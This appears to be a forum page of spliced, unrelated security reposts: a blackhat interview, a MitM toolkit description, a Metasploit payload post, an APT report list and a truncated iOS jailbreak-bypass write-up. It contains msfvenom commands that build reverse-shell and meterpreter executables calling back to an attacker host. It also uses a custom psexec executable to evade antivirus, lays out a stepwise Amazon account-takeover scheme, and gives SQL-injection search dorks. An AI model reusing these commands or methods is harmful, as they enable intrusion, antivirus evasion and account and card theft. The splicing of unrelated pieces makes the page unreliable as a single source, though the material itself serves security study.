Ceva de genul. Nu stiu unde se face diferenta. Cei cu FinFisher sunt bogati si liberi. NSA la fel. Legile ar trebui sa fie la fel pentru toti.

Are ban permanent. Puteti discuta cu el la adresa thesevensmarter@gmail.com

Interview With A Blackhat (Part 1) [This interview openly discusses criminal activities from the perspective of an admitted criminal. You may find this content distressing, even offensive, but what is described in this interview is real. We know from personal experience is that these activities are happening on websites everywhere, everyday, and perhaps even on your websites. WhiteHat Security brings this information to light for the sole purpose of assisting those who want to protect themselves on their online business.] Over the last few years, I have made myself available to be an ear for the ‘blackhat community.’ The blackhat community, often referred to as the internet underground, is a label describing those participating on the other side of the [cyber] law, who willingly break online terms of service and software licensing agreements, who may trade in warez, exploits, botnets, credit card numbers, social security numbers, stolen account credentials, and so on. For these individuals, or groups of them, there is often a profit motive, but certainly not always. Most of the time, the people I speak with in the information security industry understand the usefulness of engaging in dialog with the underground — even if it’s not something they feel comfortable doing themselves. However, I occasionally get questioned as to the rationale — the implication being that if you play with pigs you start to stink. People sometimes even begin to insinuate that one must be bad to know bad people. I think it is incredibly important for security experts to have open dialogues with the blackhat community. It’s not at all dissimilar to police officers talking with drug dealers on a regular basis as part of their job: if you don’t know your adversary you are almost certainly doomed to failure. One ‘blackhat,’ who asked to be called Adam, that I have spoken to a lot has recently said he’s decided to go legit. During this life-changing transition, he offered to give an interview so that the rest of the security community could learn from his point of view. Not every blackhat wants to talk, for obvious reasons, so this is a rare opportunity to see the world through his eyes, even if we’re unable to verify any of the claims made. Hopefully by learning how Adam and other blackhats like him think, how they communicate, people can devise better solutions, abandon failed technologies, and fix the most glaring issues. Maybe people reading this can find more effective punishments to deter the criminal behavior before it happens, or ruin the incentives, disable the markets, or find ways to keep people from the allure of criminal activity in the first place. A great deal can be unearthed by examining Adam’s words and those of other blackhats like him. Or maybe we can entice some of them, like this individual, to leave the blackhat life behind completely. Adam’s interview took place over a few days, and required a lot of back and forth. Due to the way in which this interview had to take place, a lot of editing was required to make it readable, but primarily to spelling, capitalization and punctuation. In every meaningful sense, these are Adam’s unaltered words. (Note that when Adam refers to “whitehats,” he is referring to legitimate hackers in general, and that this should not be confused with WhiteHat Security the business.) This is the first of our three-part interview. The next post will be tomorrow. Q: Can you describe what you think your hacking/security related skills are? A: My personal expertise and area of knowledge is in social engineering. I think it is pretty obvious I’m a blackhat, so I social engineer to card. Another area of “hacking” (I use the ” as DDoS isn’t really hacking) is botnet building and takedown orders. This is where most money in my opinion is made — where one day can bring in several thousand dollars. The whole blackhat market has moved from manual spreading to fully automated software. In addition, many sites are targeted in malware/info leaks by using some really common and easy methods. These include SQLi, basic and advanced XSS, CSRF, and DNS cache poisoning. Although SQLi is still a big player, XSS has taken over the market. I estimate about 50-60% of the attacks my crew did last year (Jan 1st-Jan 1st) were XSS. I also learned several programming languages — Python, Perl, C, C++, C#, Ruby, SQL, PHP, ASP, just to name a few. Q: Can you describe the first time you remember deliberately breaking a computer-related law? Why did you do it and how did you justify it? A: Hmmmmm. That was many years ago. The first time I remember was when I was in school (aged about 14). The admins were pretty good at security (for school admins, bear in mind). I was in the library one day and I knew that the admins had remote access to every PC. I also knew the librarian did. The library just so happened to be the place where they marked our exam papers and entered the grades. I was never the genius at school but I was getting mediocre grades. What if I could get ‘A’s and ‘A+’s and not do half the work? So I started to read around. I eventually came across keyloggers. It seemed strange and amazing that a program I could make (with a little research) could get me the top grades. So I did it. I installed the keylogger onto the librarian’s PC and then used the remote administration program to download the file onto the other PCs. I was suspended for two weeks. Q: Where did you learn the bulk of your skills? A: Books, Google, and the people I began speaking with on irc/forums. Unlike today’s 1337 haxorz (lol) we all shared, spoke, and helped each other. There wasn’t a sense of being mocked because you didn’t know. Q: What attracted you to the blackhat way of life? A: Money. I found it funny how watching tv and typing on my laptop would earn me a hard worker’s monthly wage in a few hours. [it was] too easy in fact. Q: Can you recall a tipping point at which you started considering yourself a blackhat? What was the nature of the event? A: It’s difficult really. I and the guys/girls I hung with never called ourselves blackhats, I don’t know, it was just too James Bond like. We just saw ourselves as people who found a way to make money. We didn’t care about what category we were in. It was just easy and funny. Although saying that, I first realized I might be branded a blackhat when my “real life” friend became a victim of credit card fraud. That’s when I realized my actions had real victims and not just numbers that were worth money. Q: How many machines do you think you directly controlled at the peak of your botnet activity? A: Erm, depends. I had two separate botnets (although some bots cross over). The DDoS botnet contained the bots which were public computers or computers that were in offices. [There were] two reasons I did that. Either: 1. they are on for the majority of the day and have good connection speeds or 2. people weren’t stupid enough to do their banking on them (if you were I’d let a script kiddy have it). Then there was my carding botnet, definitely the most valuable. These were PCs of banks, estate agents, supermarkets and obviously home PCs. I preferred to target PCs where an employee would enter customer data, i.e. banks (yes banks are super easy to bot). This gave me a constant supply of credit cards and a never-ending amount of spam ammo. DDoS botnet has about 60-70k bots at the moment, most in the west. Carding botnet had a lot less at around 5-10k, most in Asia. 570k is the biggest I’ve controlled. Q: How much money do you think you made after expenses per year at your peak doing blackhat activities? A: I can’t really go into specifics but when 9/11 happened we were making millions. Q: And how much do you think you made last year? A: Off the top of my head? Around about 400-500k. Last year was kind of shit. People became wiser, patches became more frequent. This year we have 3/4 of that amount already. Q: When you started, did you have a goal in mind to make a certain amount of money or achieve a certain goal? A: I get asked this a lot by new people on the forums. I never set myself goals until probably in the last 4 years. I started it out just for easy laughs, bragging rights (lol) and easy, very easy money. Q: Can you describe the process that you use to make money with your botnet? A: Making money with a botnet is easier than brushing your teeth, especially if you’re in the automated industry. Any crew has several members. The bot master, researcher, reverse engineer, spreader, social engineer, sales man and fudder*. The people who sell 0-days are solely selling 0-days half the time. The buyers are bot masters without a crew. Our crew developed a tool that checks the bot’s cache for Facebook/twitter accounts then checks their Facebook interests (e.g. justin bieber), then age, name, location. So for example bot no. 2 is signed into Facebook. The account likes Justin Bieber, aged 14, female, and lives in America (important to get correct language). Then automatically it selects a pre made list of links and for example would choose the ‘Justin bieber sex tape video’. Using zero days to compromise a website, then insert an iframe is kinda old, boring and sometimes doesn’t bring in the best results — unless of course you’re hijacking a high Alexa rating; then it’s worth it. Combining 0-days to deface the website and then a 0-day in e.g. java to hijack with a drive by is a lot more effective than tracking the user into downloading a file. What a lot of people don’t realize is that emails easily available on their Facebook profile can be sold for spam. Again, this makes more money automatically. * A fudder can be a tool that binds to a virus and makes it more difficult for antivirus to detect, or a person specializing in such a tool. Q: How easy is it for you to compromise a website and take control over it? A: For beginners you can simply Google inurl:money.php?id= — go ahead try it. But most of them will be cancelled or dried up. So, now you target bigger websites. I like to watch the news; especially the financial side of it. Say if a target just started up and it suddenly sky rocketed in online sales that’ll become a target. Most of these websites have admins behind them who have no practical experience of being the bad guy and how the bad guys think. This leaves them hugely vulnerable. They patch SQL but choose a DNS that is vulnerable to DNS cache poisoning. You can break in and be gone within an hour. Q: How easy is it for you to take over the ownership of an account via whois information or other publicly available information? A: Whois used to be crucial to gaining information. Now people spew it on Facebook, twitter, etc. Companies like Amazon only require name, address and email on the account to add another credit card. You then hang up. Ring the password reset department and tell them as verification the name, address, email and the credit card number you just added (it doesn’t even have to work (lol), just use fakenamegenerator.com) and then you are in. You can now see the ‘legit’ credit card’s last 4 digits. Now you can get an email password reset and you’re in. Amazon says they patched this two years ago but I use this method all the time. Seriously Amazon, train your staff. Q: What is your favorite kind of website to compromise? Or are your hack attempts entirely untargeted? What are the easiest sites to monetize? A: Most of the time un-targeted but once a company (which I won’t name) pissed me off for not giving me discount in a sale so we leaked every single credit card number online. One type of company I love to target is Internet security, i.e. anti virus companies. There is nothing better than a clothing store at the summer sales (except porn websites). These are in my personal opinion the easiest and most successful targets to breach. I’ll talk about clothes stores first. Clothing websites are SO easy because of two main types of attacks. 1. The admins never ever have two-step authentication. I don’t know why, but I have never seen one admin have it (and I’ve done it thousands of times). 2. The ‘admin’ usually works there behind the tills or in the offices. They have no clue what they’re doing: they just employ someone to make the website then they run it. They never ever have HTTPS, [so they have] huge SQLi vulnerabilities (e.g.. inurl: product.php?id=). Once you have the SQLi vulnerability you can go two routes or both. Route one: steal the credit card info and leave. Route two: deface the website, keep the original HTML code but install an iframe that redirects to a drive by download of a banking Trojan. Now to discuss my personal favourite: porn sites. One reason why this is so easy: The admins don’t check to see what the adverts redirect to. Upload an ad of a well-endowed girl typing on Facebook, someone clicks, it does a drive by download again. But this is where it’s different: if you want extra details (for extortion if they’re a business man) you can use SET to get the actual Facebook details which, again, can be used in social engineering. Q: What is your favorite/most effective exploit against websites and why? A: If it’s a 0-day, that obviously ranks at the top. But below that is XSS. It’s really well known but no one patches it. I suppose DDoS isn’t really classed as an exploit but that can bring in monthly ‘rent’ for our ‘protection’. But over all 0-days are the greatest exploits. Q: How do you monetize DDoS? A: People buy accounts so for example you rent 1k bots and have a DDoS time limit of 30 mins. Some people buy one-offs. Black mail is a huge part of it. Take the website down for an hour. Email them or call them and say they pay 200 dollars or it stays offline for good. They usually pay up. If they don’t, they lose days, weeks, months of business. Q: How do you pick targets to DDoS when you are attempting to extort them? A: Hmmm. It depends. If there is a big sporting event, e.g. the Super Bowl, I can guarantee 95% of bookies have been extorted. I knew of one group who took down cancer research website and extorted them after their race for life donation process was meant to start. They got their money, kinda sad really. Q: What kind of people tend to want to buy access to your botnet and/or what do you think they use it for? A: Some people say governments use it, rivals in business. To be honest, I don’t care. If you pay you get a service. Simple. Continue Reading Part 2 This entry was posted in Web Application Security on May 21, 2013 by Robert Hansen. Sursa: https://blog.whitehatsec.com/interview-with-a-blackhat-part-1/

netool.sh V4.4 MitM PENTESTING OPENSOURCE T00LKIT v4.4 WIKI netool.sh toolkit provides a fast and easy way For new arrivals to IT security pentesting and also to experience users to use allmost all features that the Man-In-The-Middle can provide under local lan, since scanning, sniffing and social engeneering attacks "[spear phishing attacks]"... DESCRIPTION "Scanning - Sniffing - Social Engeneering" Netool: its a toolkit written using 'bash, python, ruby' that allows you to automate frameworks like Nmap, Driftnet, Sslstrip, Metasploit and Ettercap MitM attacks. this toolkit makes it easy tasks such as SNIFFING tcp/udp traffic, Man-In-The-Middle attacks, SSL-sniff, DNS-spoofing, D0S attacks in wan/lan networks, TCP/UDP packet manipulation using etter-filters, and gives you the ability to capture pictures of target webbrowser surfing (driftnet) also uses macchanger to decoy scans changing the mac address. Rootsector: module allows you to automate some attacks over DNS_SPOOF + MitM (phishing - social engineering) using metasploit, apache2 and ettercap frameworks. like the generation of payloads,shellcode,backdoors delivered using dns_spoof and MitM method to redirect a target to your phishing webpage. Recently was introduced "inurlbr" webscanner (by cleiton) that allow us to search SQL related bugs, using severeal search engines, also this framework can be used in conjunction with other frameworks like nmap, (using the flag --comand-vul) Example: inurlbr.php -q 1,2,10 --dork 'inurl:index.php?id=' --exploit-get ?´0x27 -s report.log --comand-vul 'nmap -Pn -p 1-8080 --script http-enum --open _TARGET_' * STABLE repository | GIT repository | | CHANGELOG | BUG-REPORTS * Operative Systems Supported Linux-Ubuntu | Linux-kali | Parrot security OS | blackbox OS Linux-backtrack (un-continued) | Mac osx (un-continued). "REMARK" The project 'opensource-kali' as build to work on most pentesting distros, like: blackbox,parrot,backtrack,kali,etc, with little configuration needed. Sutch as: install the toolkit in the rigth path, set executable permisions to all files, and config paths to dependencies (in "toolkit_config" file). so its the obvious choise if you desire to install the toolkit on a diferent distro (than ubuntu or kali). * UBUNTU install | KALI install | OTHER DISTROS install | UNIVERSAL INSTALLER * Dependencies "TOOLKIT DEPENDENCIES" zenity | Nmap | Ettercap | Macchanger | Metasploit | Driftnet | Apache2 | sslstrip "SCANNER INURLBR.php" curl | libcurl3 | libcurl3-dev | php5 | php5-cli | php5-curl * Install zenity | Install nmap | Install ettercap | Install macchanger | Install metasploit | Install Apache2 * Credits x0ra-machine "Pentesting Lab" | Apofis Kaizer "Debug on Mac OSx" Fyodor "Nmap" | ALoR & NaGa "Ettercap" | HD moore "Metasploit" Moxie M "Sslstrip" | Chris L "Driftnet" | j0rgan "Cupp.py" Cleiton p "inurlbr.php" | ReL1K "unicorn.py" "Develop by: pedr0 Ubuntu [r00t-3xp10it]" Suspicious Shell Activity Labs@2014 | r00tsect0r CyberTeam Red Team Collaborations Sursa: http://sourceforge.net/p/netoolsh/wiki/netool.sh%20script%20project/

Custom payloads in Metasploit 4 One of the key features of Metasploit is the customization of the framework; for example, different payloads can be generated with many different options and placed in any of a large number of exploits. Custom scripts can be written with many commands for automated post-exploit actions. Nevertheless, there have still been a number of customizations that have been awkward to implement. Many of those deal with adding a payload that isn’t in the framework, or modifying it in a way that the framework does not directly support. So for Metasploit 4, I made a few tweaks to increase payload flexibility. Generic/custom The first change was an addition of a single custom payload. Prior to this, a custom payload existed for command execution exploits for UNIX (payload/cmd/unix/generic) but there was no analogous payload for command execution exploits for Windows, or for that matter any other architecture or platform. If you are developing a payload that could benefit from Metasploit integration, writing a payload module is preferable. But in some cases, such as generating multiple payloads, Metasploit might not currently support the UI or backend to generate the payload in a conventional way, and you may want to import the payload from a file or option. Or while writing a payload, it can be easier to import a payload into the framework than change a module. Multipayloads The second change made it easier to combine multiple payloads into one exploit, since you may not get a second chance to exploit your target service, get them to open an exploit document, etc. The first shot at allowing the framework to creating a single payload that is a combination of a number of payloads was the “none” exitfunc. Most payloads allow you to set the “EXITFUNC” option. This option effectively sets a function hash in the payload that specifies a DLL and function to call when the payload is complete. Usually it is set to thread or process, which corresponds to the ExitThread or ExitProcess calls. I added a ‘none’ that calls GetLastError, effectively a no-op. The thread will then continue executing, allowing you to simply cat multiple payloads together to be run in serial. msfvenom -p windows/shell_reverse_tcp -f raw -e generic/none LHOST=192.168.1.2 LPORT=5555 EXITFUNC=none > pay.raw msfvenom -p windows/shell_reverse_tcp -f raw -e generic/none LHOST=192.168.1.2 LPORT=4444 EXITFUNC=none >> pay.raw msfvenom -f exe -p - > msf.exe < pay.raw For some reason that didn't function in my XP vm, but it worked fine in my win7 VM. When the first reverse shell either failed or ran and the shell exited, the second reverse shell was started. Unfortunately this doesn't help you if the first freezes, but it's a start. Unfortunately the biggest problem is that many payloads don't have a clean execution path after the exitfunc. For example, the windows/exec payload places the exitfunc block before the command to be executed, so instead of running to the next payload, it tries to execute the ascii command as x86 instructions. This fails badly. Parallel multipayloads The solution is to enable running payloads in parallel, using roughly the same technique as in the exe payload injection code. That code injects a payload into an existing exe to run in a new thread while the old exe code continues to run normally. (-f option in msfvenom and msfencode) So now with the -c option, you can generate shellcode to be run in a new thread while the shellcode in the file specified by the -c option will be run in the main thread. And of course you can continue to add payloads to be run in parallel in subsequent commands. $ ruby msfvenom -h Usage: msfvenom [options] Options: ... -c, --add-code [path] Specify an additional win32 shellcode file to include -x, --template [path] Specify a custom executable file to use as a template -k, --keep Preserve the template behavior and inject the payload as a new thread ... $ ruby msfvenom -p windows/messagebox -f raw EXITFUNC=thread > /tmp/msgbox.raw $ ruby msfvenom -p windows/meterpreter/reverse_tcp -f exe -c /tmp/msgbox.raw LHOST=192.168.0.102 EXITFUNC=thread > /tmp/rev102msgbox.exe This code generates an executable that runs a messagebox payload in one thread while a reverse-connect meterpreter is spawned in another thread. Custom executables The last change came in response to a number of requests to use a custom executable in the psexec exploit that generates and drops an executable onto the target system to execute. Since some antivirus products will block metasploit generated exe's, yet it is not difficult to manually generate an undetected executable, it makes sense to allow exploits like psexec to use an external exe as the payload. This change was implemented in the exe mixin used by executable-dropping exploits, and so is available in all similar exploits as well. The option is the advanced option EXE::Custom. , , / \ ((__---,,,---__)) (_) O O (_)_________ \ _ / |\ o_o \ M S F | \ \ _____ | * ||| WW||| ||| ||| =[ metasploit v4.0.1-dev [core:4.0 api:1.0] + -- --=[ 725 exploits - 367 auxiliary - 78 post + -- --=[ 226 payloads - 27 encoders - 8 nops =[ svn r13559 updated today (2011.08.14) msf > use exploit/windows/smb/psexec msf exploit(psexec) > set EXE::Custom /tmp/mypayload.exe EXE::Custom => /tmp/mypayload.exe ... and proceed normally, without being bothered by pesky antivirus. Sursa: Custom payloads in Metasploit 4 « Thoughts on Security

Various public documents, whitepapers and articles about APT campaigns APT Notes This is a repository for various publicly-available documents and notes related to APT, sorted by year. For malware sample hashes, please see the individual reports Contributing For the moment, it would be nice to have a PDF of the article that we add to the list, just to be sure we always have a copy. To contribute, you can either: Fork, add and send me a pull request Open a ticket with the data you want to be added Adding data: Add a link to the public document to README.md page Add the PDF file to the appropriate year Thanks to the contributors for helping with the project! Papers The papers section contains historical documents. 2006 "Wicked Rose" and the NCPH Hacking Group 2008 Aug 10 - Russian Invasion of Georgia Russian Cyberwar on Georgia Oct 02 - How China will use cyber warfare to leapfrog in military competitiveness Nov 04 - China's Electronic Long-Range Reconnaissance Nov 19 - Agent.BTZ 2009 Jan 18 - Impact of Alleged Russian Cyber Attacks Mar 29 - Tracking GhostNet 2010 Jan 12 - Operation Aurora Jan 13 - The Command Structure of the Aurora Botnet - Damballa Jan 20 - McAfee Labs: Combating Aurora Jan 27 - Operation Aurora Detect, Diagnose, Respond Jan ?? - Case Study: Operation Aurora - Triumfant Feb 24 - How Can I Tell if I Was Infected By Aurora? (IOCs) Mar 14 - In-depth Analysis of Hydraq Apr 06 - Shadows in the cloud: Investigating Cyber Espionage 2.0 Sep 03 - The "MSUpdater" Trojan And Ongoing Targeted Attacks Sep 30 - W32.Stuxnet Dossier Dec 09 - The Stuxnet Computer Worm: Harbinger of an Emerging Warfare Capability 2011 Feb 10 - Global Energy Cyberattacks: Night Dragon Feb 18 - Night Dragon Specific Protection Measures for Consideration Apr 20 - Stuxnet Under the Microscope Aug ?? - Shady RAT Aug 04 - Operation Shady RAT Aug 02 - Operation Shady rat : Vanity Aug 03 - HTran and the Advanced Persistent Threat Sep 09 - The RSA Hack Sep 11 - SK Hack by an Advanced Persistent Threat Sep 22 - The "LURID" Downloader Oct 12 - Alleged APT Intrusion Set: "1.php" Group Oct 26 - Duqu Trojan Questions and Answers Oct 31 - The Nitro Attacks: Stealing Secrets from the Chemical Industry Dec 08 - Palebot trojan harvests Palestinian online credentials 2012 Jan 03 - The HeartBeat APT Feb 03 - Command and Control in the Fifth Domain Feb 29 - The Sin Digoo Affair Mar 12 - Crouching Tiger, Hidden Dragon, Stolen Data Mar 13 - Reversing DarkComet RAT's crypto Mar 26 - Luckycat Redux Apr 10 - Anatomy of a Gh0st RAT Apr 16 - OSX.SabPub & Confirmed Mac APT attacks May 18 - Analysis of Flamer C&C Server May 22 - IXESHEA An APT Campaign May 31 - sKyWIper (Flame/Flamer) Jul 10 - Advanced Social Engineering for the Distribution of LURK Malware Jul 11 - Wired article on DarkComet creator Jul 27 - The Madi Campaign Aug 09 - Gauss: Abnormal Distribution Sep 06 - The Elderwood Project Sep 07 - IEXPLORE RAT Sep 12 - The VOHO Campaign: An in depth analysis Sep 18 - The Mirage Campaign Oct 08 - Matasano notes on DarkComet, Bandook, CyberGate and Xtreme RAT Oct 27 - Trojan.Taidoor: Targeting Think Tanks Nov 01 - RECOVERING FROM SHAMOON Nov 03 - Systematic cyber attacks against Israeli and Palestinian targets going on for a year 2013 Jan 14 - The Red October Campaign Jan 14 - Red October Diplomatic Cyber Attacks Investigation Jan 18 - Operation Red October Feb 12 - Targeted cyber attacks: examples and challenges ahead Feb 18 - Mandiant APT1 Report Feb 22 - Comment Crew: Indicators of Compromise Feb 26 - Stuxnet 0.5: The Missing Link Feb 27 - The MiniDuke Mystery: PDF 0-day Government Spy Assembler 0x29A Micro Backdoor Feb 27 - Miniduke: Indicators v1 Mar 13 - You Only Click Twice: FinFisher’s Global Proliferation Mar 17 - Safe: A Targeted Threat Mar 20 - Dissecting Operation Troy Mar 20 - The TeamSpy Crew Attacks Mar 21 - Darkseoul/Jokra Analysis And Recovery Mar 27 - APT1: technical backstage (Terminator/Fakem RAT) Mar 28 - TR-12 - Analysis of a PlugX malware variant used for targeted attacks Apr 01 - Trojan.APT.BaneChant Apr 13 - "Winnti" More than just a game Apr 24 - Operation Hangover May ?? - Operation Hangover May 30 - TR-14 - Analysis of a stage 3 Miniduke malware sample Jun ?? - The Chinese Malware Complexes: The Maudi Surveillance Operation Jun 01 - Crude Faux: An analysis of cyber conflict within the oil & gas industries Jun 04 - The NetTraveller (aka 'Travnet') Jun 07 - KeyBoy, Targeted Attacks against Vietnam and India Jun 18 - Trojan.APT.Seinup Hitting ASEAN Jun 21 - A Call to Harm: New Malware Attacks Target the Syrian Opposition Jun 28 - njRAT Uncovered Jul 09 - Dark Seoul Cyber Attack: Could it be worse? Jul 15 - PlugX revisited: "Smoaler" Jul 31 - Secrets of the Comfoo Masters Jul 31 - Blackhat: In-Depth Analysis of Escalated APT Attacks (Lstudio,Elirks), Aug ?? - Operation Hangover - Unveiling an Indian Cyberattack Infrastructure Aug ?? - APT Attacks on Indian Cyber Space Aug 02 - Where There is Smoke, There is Fire: South Asian Cyber Espionage Heats Up Aug 02 - Surtr: Malware Family Targeting the Tibetan Community Aug 19 - ByeBye Shell and the targeting of Pakistan Aug 21 - POISON IVY: Assessing Damage and Extracting Intelligence Aug 23 - Operation Molerats: Middle East Cyber Attacks Using Poison Ivy Sep ?? - Feature: EvilGrab Campaign Targets Diplomatic Agencies Sep 11 - The "Kimsuky" Operation Sep 13 - Operation DeputyDog: Zero-Day (CVE-2013-3893) Attack Against Japanese Targets Sep 17 - Hidden Lynx - Professional Hackers for Hire Sep 25 - The 'ICEFROG' APT: A Tale of cloak and three daggers Sep 30 - World War C: State of affairs in the APT world Oct 24 - Terminator RAT or FakeM RAT Nov 10 - Operation Ephemeral Hydra: IE Zero-Day Linked to DeputyDog Uses Diskless Method Nov 11 - Supply Chain Analysis Dev 02 - njRAT, The Saga Continues Dec 11 - Operation "Ke3chang" Dec 20 - ETSO APT Attacks Analysis ??? ?? - Deep Panda ??? ?? - Detecting and Defeating the China Chopper Web Shell 2014 Jan 06 - PlugX: some uncovered points Jan 13 - Targeted attacks against the Energy Sector Jan 14 - The Icefog APT Hits US Targets With Java Backdoor Jan 15 - “New'CDTO:'A'Sneakernet'Trojan'Solution Jan 21 - Shell_Crew (Deep Panda) Jan 31 - Intruder File Report- Sneakernet Trojan Feb 11 - Unveiling "Careto" - The Masked APT Feb 13 - Operation SnowMan: DeputyDog Actor Compromises US Veterans of Foreign Wars Website Feb 19 - The Monju Incident Feb 19 - XtremeRAT: Nuisance or Threat? Feb 20 - Operation GreedyWonk: Multiple Economic and Foreign Policy Sites Compromised, Serving Up Flash Zero-Day Exploit Feb 20 - Mo' Shells Mo' Problems - Deep Panda Web Shells Feb 23 - Gathering in the Middle East, Operation STTEAM Feb 28 - Uroburos: Highly complex espionage software with Russian roots Mar 06 - The Siesta Campaign Mar 07 - Snake Campaign & Cyber Espionage Toolkit Mar 08 - Russian spyware Turla Apr 26 - CVE-2014-1776: Operation Clandestine Fox May 13 - Operation Saffron Rose (aka Flying Kitten) May 13 - CrowdStrike's report on Flying Kitten May 20 - Miniduke Twitter C&C May 21 - RAT in jar: A phishing campaign using Unrecom Jun 06 - Illuminating The Etumbot APT Backdoor (APT12) Jun 09 - Putter Panda Jun 20 - Embassy of Greece Beijing Jun 30 - Dragonfly: Cyberespionage Attacks Against Energy Suppliers Jun 10 - Anatomy of the Attack: Zombie Zero Jul 07 - Deep Pandas Jul 10 - TR-25 Analysis - Turla / Pfinet / Snake/ Uroburos Jul 11 - Pitty Tiger Jul 20 - Sayad (Flying Kitten) Analysis & IOCs Jul 31 - Energetic Bear/Crouching Yeti Jul 31 - Energetic Bear/Crouching Yeti Appendix Aug 04 - Sidewinder Targeted Attack Against Android Aug 05 - Operation Arachnophobia Aug 06 - Operation Poisoned Hurricane Aug 07 - The Epic Turla Operation Appendix Aug 12 - New York Times Attackers Evolve Quickly (Aumlib/Ixeshe/APT12) Aug 13 - A Look at Targeted Attacks Through the Lense of an NGO Aug 18 - The Syrian Malware House of Cards Aug 20 - El Machete Aug 25 - Vietnam APT Campaign Aug 27 - NetTraveler APT Gets a Makeover for 10th Birthday Aug 27 - North Korea’s cyber threat landscape Aug 28 - Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks Aug 29 - Syrian Malware Team Uses BlackWorm for Attacks Sep 03 - Darwin’s Favorite APT Group (APT12) Sep 04 - Forced to Adapt: XSLCmd Backdoor Now on OS X Sep 08 - Targeted Threat Index: Characterizingand Quantifying Politically-MotivatedTargeted Malware video Sep 08 - When Governments Hack Opponents: A Look at Actors and Technology video Sep 10 - Operation Quantum Entanglement Sep 17 - Chinese intrusions into key defense contractors Sep 18 - COSMICDUKE: Cosmu with a twist of MiniDuke Sep 19 - Watering Hole Attacks using Poison Ivy by "th3bug" group Sep 23 - Sep 26 - Aided Frame, Aided Direction (Sunshop Digital Quartermaster) Sep 26 - BlackEnergy & Quedagh Oct 03 - New indicators for APT group Nitro Oct 09 - Democracy in Hong Kong Under Attack Oct 14 - ZoxPNG Preliminary Analysis Oct 14 - Hikit Preliminary Analysis Oct 14 - Derusbi Preliminary Analysis Oct 14 - Group 72 (Axiom) Oct 14 - Sandworm - CVE-2104-4114 Oct 20 - OrcaRAT - A whale of a tale Oct 22 - Operation Pawn Storm: The Red in SEDNIT Oct 22 - Sofacy Phishing by PWC Oct 23 - Modified Tor Binaries Oct 24 - LeoUncia and OrcaRat Oct 27 - Full Disclosure of Havex Trojans - ICS Havex backdoors Oct 27 - ScanBox framework – who’s affected, and who’s using it? Oct 28 - APT28 - A Window Into Russia's Cyber Espionage Operations Oct 28 - Group 72, Opening the ZxShell Oct 30 - The Rotten Tomato Campaign Oct 31 - Operation TooHash Nov 03 - New observations on BlackEnergy2 APT activity Nov 03 - Operation Poisoned Handover: Unveiling Ties Between APT Activity in Hong Kong’s Pro-Democracy Movement Nov 10 - The Darkhotel APT - A Story of Unusual Hospitality Nov 11 - The Uroburos case- Agent.BTZ’s successor, ComRAT Nov 12 - Korplug military targeted attacks: Afghanistan & Tajikistan Nov 13 - Operation CloudyOmega: Ichitaro 0-day targeting Japan Nov 14 - OnionDuke: APT Attacks Via the Tor Network Nov 14 - Roaming Tiger (Slides) Nov 21 - Operation Double Tap | IOCs Nov 23 - Symantec's report on Regin Nov 24 - Kaspersky's report on The Regin Platform Nov 24 - TheIntercept's report on The Regin Platform Nov 24 - Deep Panda Uses Sakula Malware Nov 30 - FIN4: Stealing Insider Information for an Advantage in Stock Trading? Dec 02 - Operation Cleaver | IOCs Dec 03 - Operation Cleaver: The Notepad Files Dec 08 - The 'Penquin' Turla Dec 09 - The Inception Framework Dec 10 - Cloud Atlas: RedOctober APT Dec 10 - W32/Regin, Stage #1 Dec 10 - W64/Regin, Stage #1 Dec 10 - South Korea MBR Wiper Dec 12 - Vinself now with steganography Dec 12 - Bots, Machines, and the Matrix Dec 17 - Wiper Malware – A Detection Deep Dive Dec 18 - Malware Attack Targeting Syrian ISIS Critics Dec 19 - TA14-353A: Targeted Destructive Malware (wiper) Dec 21 - Operation Poisoned Helmand Dec 22 - Anunak: APT against financial institutions 2015 Jan 11 - Hong Kong SWC attack Jan 12 - Skeleton Key Malware Analysis Jan 15 - Evolution of Agent.BTZ to ComRAT Jan 20 - Analysis of Project Cobra Jan 20 - Reversing the Inception APT malware Jan 22 - The Waterbug attack group Jan 22 - Scarab attackers Russian targets | IOCs Jan 22 - Regin's Hopscotch and Legspin Jan 27 - Comparing the Regin module 50251 and the "Qwerty" keylogger Jan 29 - Backdoor.Winnti attackers and Trojan.Skelky Jan 29 - Analysis of PlugX Variant - P2P PlugX Feb 02 - Behind the Syrian Conflict’s Digital Frontlines Feb 04 - Pawn Storm Update: iOS Espionage App Found Feb 10 - CrowdStrike Global Threat Intel Report for 2014 Feb 16 - Equation: The Death Star of Malware Galaxy Feb 16 - The Carbanak APT Feb 16 - Operation Arid Viper Feb 17 - Desert Falcons APT Sursa: https://github.com/kbandla/APTnotes

a trivial iOS jailbreak detection bypass introduction Not too long ago, I toyed with a Android root detection bypass. In a similar scenario, I was poking at a iOS application that also had some root detection built in. For very much the same purpose, I suppose the application has its own ~reasons~ for the jailbreak detection. Of course, this makes the testing I actually wanted to do impossible as I’d very much like to dig under the hood So, its was time to try and bypass the jailbreak detection of the application. All I had to work with was a .ipa. Similar to the android .apk file, the .ipa is also just a zipped up archive of the actual application files. To test with, I had a iPad mini. The iPad was running the latest iOS (8.1.2 at the time of this post) and was also jailbroken. If I remember correctly the jailbreak tool used was called TaiG. Anyways, inside the applications .ipa archive was a whole bunch of resource files and what not, including the compiled application executable. This executable is what is of interest. understanding the behavior I installed the app onto my iPad, and started to inspect its behavior. When the application starts, it would immediately throw a security related error, notifying the user that it has detected the environment as one that is jailbroken. This happens pretty fast too. Once the jailbreak detection error shows, the application refuses to continue to run. Restarting the application simply continues this loop. I studied some iOS jailbreak detection methods online which revealed many of them as being pretty obvious. From detecting the presence of /bin/bash or Cydia.app, to examining the exit status if fork(). There are some more advanced methods as well such as checking the existence of certain known dylib’s too (which apparently is the hardest to circumvent). For the purpose of this post, the jailbreak detection was pretty weak and did not have any of the more advanced methods implemented. In fact, I am pretty sure there won’t be that many apps out there that will be this easy to bypass. discovering the implementation Armed with some knowledge of how its typically done in the iOS world, I proceeded to take a look at the actual application binary: [TABLE] [TR] [TD=class: gutter]1 2[/TD] [TD=class: code]leonjza@laptop » file myApplication myApplication: Mach-O executable arm[/TD] [/TR] [/TABLE] Compiled as a Mach-O executable from Objective-C, I loaded up the binary from the extracted .ipa into the Hopper disassembler to help me get an idea of what is happening. Hopper has some nice features such as generating pseudo code etc, so I quite like using it for these types of excursions. To start off, I searched around for strings that were related to the word jailbreak within the app. Class definitions, methods or any strings related to the term jailbreak was ok. I just wanted to get something to start off with. I found nothing. Of course this had me thinking that I may have missed the plot entirely. I continued to search for other things related to jailbreaking, and got a hit immediately for the term /bin/bash in the string section: In fact, there are quite a few other jailbreak related strings in this section. From within 